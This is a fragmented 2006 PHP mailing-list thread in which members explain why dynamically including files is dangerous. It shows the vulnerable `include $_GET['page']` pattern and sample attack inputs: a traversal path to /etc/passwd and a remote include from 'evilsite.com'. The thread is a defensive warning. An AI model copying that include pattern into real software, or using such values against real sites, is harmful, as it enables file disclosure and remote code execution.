No.
He's saying YOUR code is, more or less, not unlike:
Maybe it's more like this:
Well, if at some point, you forget to initialize $page, AND IF you
have register_globals on, for some reason, perhaps even because you
later install some 3rd-party software that needs it, and you integrate
t
On Tue, June 13, 2006 9:17 pm, Dave M G wrote:
> Richard Lynch wrote:
>> The problem with making it dynamic, is that you've just made it
>> AWFULLY easy for some Bad Guy to inject their own PHP file into your
>> system...
>>
>> Think about that for awhile.
> I have thought about it, and I can only
On Wednesday 14 June 2006 21:48, Dave M G wrote:
> Jochem,
>
> > ::index.php
> >
> > <?php
> > include $_GET['page'];
> > ?>
>
> Wouldn't strip_tags() eliminate the tags that make this possible?
No, because that's not what the hole is. YOUR CODE is include $_GET['page'].
That's an easily exploitable
Jochem,
::index.php
Wouldn't strip_tags() eliminate the tags that make this possible?
--
Dave M G
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Dave M G wrote:
> Larry,
>
> Thank you for responding.
>>
>> $untrusted_var = '../../../../../../../etc/passwd';
>> include($untrusted_var);
>>
>> Or in later versions of PHP, I *think* the following may even work:
>>
>> $untrusted_var = 'http://evilsite.com/pub/evil.php';
>> include($untrusted_va
Larry,
Thank you for responding.
$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);
Or in later versions of PHP, I *think* the following may even work:
$untrusted_var = 'http://evilsite.com/pub/evil.php';
include($untrusted_var);
I'm still not sure I see the danger
On Tuesday 13 June 2006 21:17, Dave M G wrote:
> If there is some other way for them to exploit a dynamic include()
> function, then please let me know.
$untrusted_var = '../../../../../../../etc/passwd';
include($untrusted_var);
Or in later versions of PHP, I *think* the following may even work
Richard Lynch wrote:
The problem with making it dynamic, is that you've just made it
AWFULLY easy for some Bad Guy to inject their own PHP file into your
system...
Think about that for awhile.
I have thought about it, and I can only see it as possible if the person
already has the ability to wr
The problem with making it dynamic, is that you've just made it
AWFULLY easy for some Bad Guy to inject their own PHP file into your
system...
Think about that for awhile.
On Tue, June 13, 2006 5:22 am, Dave M G wrote:
> PHP List,
>
> Up until now, in order to get all the functions and classes
Anyway when you include files by script (not specifying the order in
which you include them) check out class inheritance and class usage in
files you include. Classes that are inherited must be included first.
Andy
At 7:22 PM +0900 6/13/06, Dave M G wrote:
PHP List,
Up until now, i
At 7:22 PM +0900 6/13/06, Dave M G wrote:
>PHP List,
>
>Up until now, in order to get all the functions and classes I need in my
>scripts, I have always made a file called "includes.php" that contains a
>series of include() statements for all of the files that I want to include.
>Then I just inc
PHP List,
Up until now, in order to get all the functions and classes I need in my
scripts, I have always made a file called "includes.php" that contains a
series of include() statements for all of the files that I want to
include. Then I just include that one file at the top of all my PHP scr